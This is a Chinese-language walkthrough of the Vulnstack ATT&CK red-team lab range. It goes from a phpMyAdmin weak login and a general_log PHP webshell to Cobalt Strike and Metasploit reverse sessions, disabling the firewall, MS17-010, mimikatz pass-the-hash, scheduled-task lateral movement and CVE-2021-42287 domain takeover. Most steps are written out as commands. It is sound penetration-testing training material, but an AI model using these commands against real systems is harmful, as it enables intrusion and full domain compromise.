ATT&CK红队评估实战靶场一

靶场下载:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

网络拓扑图:

1
2
3
4
5
6
7
kali: 192.168.210.128

web机:192.168.210.129

windows 2003: 192.168.17.130

windows 2008(域控): 192.168.17.129

环境搭建

VM2为域内网段(windows 2003,windows 2008 R2)

VM8为外网网段(kali,web机)

web机能ping通域内,能ping通kali即可

web机开启phpstudy

访问页面成功

信息收集

nmap扫一波端口

nmap -sS -Pn 192.168.210.129

开放了80和3306端口

看到php探针,反手往目录里敲一个/phpmyadmin

phpmyadmin getshell

弱口令登陆成功 root/root

查看有没有配置secure_file_priv

secure_file_priv=null,也就是不可写,这一方法不可行

选择全局日志getshell

查看日志:show variables like '%general%';

我们将它开启,并写入shell.php

1
2
set global general_log=on; #开启全局日志
set global general_log_file='C:/phpStudy/WWW/shell.php'; #更改日志路径

写入一句话

1
select <?php eval($_POST[shell]);?>

成功往日志写入一句话

蚁剑连接成功

内网信息收集

为administrator权限

ipconfig /all发现有两张网卡,存在域

权限较高,直接上线cs

抓到密码,直接是域控的

端口扫描(192.168.210):

没有什么可以利用的

端口扫描(192.168.17):

发现内网还有另外两台机器

不出意外129那台机器应该就是域控

首先根据WEB机创建一个listener,然后使用web机做跳板机

成功上线域内一台主机

cs与msf联动

将cs会话转发到msf上

msf设置监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost
set lport
run

cs中右键spawn

收到会话

net view 查看域内成员

关闭防火墙

1
2
netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

如果出现中文乱码使用 chcp 65001 更改

尝试使用ms17010打一波域控

首先使用scan模块探测一波

1
2
3
4
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.17.0/24
run

在扫到129时,msf爆绿,可能存在ms17-010,而129就是域控

漏洞利用

1
2
3
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.17.129
run

利用失败,无法直接拿下

上线域控

访问共享文件夹

创建白银票据,使用hash传递的方式,创建票据

1
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141(WEB机的)

再次访问域控C盘

成功共享域控文件夹

制作一个smb的正向马,并传到域控机器上

1
shell copy c:\yukong.exe \\owa\c$

使用at计划任务并连接

1
2
at \\owa 11:11 C:/yukong.exe #计划任务
link 192.168.17.129 #主动连接域控

成功上线域控

使用cs psexec横向也是一个道理

CVE-2021-42287

使用最新提权漏洞CVE-2021-42287

首先开一个socks,cs中开启即可,proxychains中进行设置

使用命令一键上线域控:proxychains4 python3 sam_the_admin.py 'god/liukaifeng01:123456Zb.' -dc-ip 192.168.17.129 -shell

直接拿下域控,通杀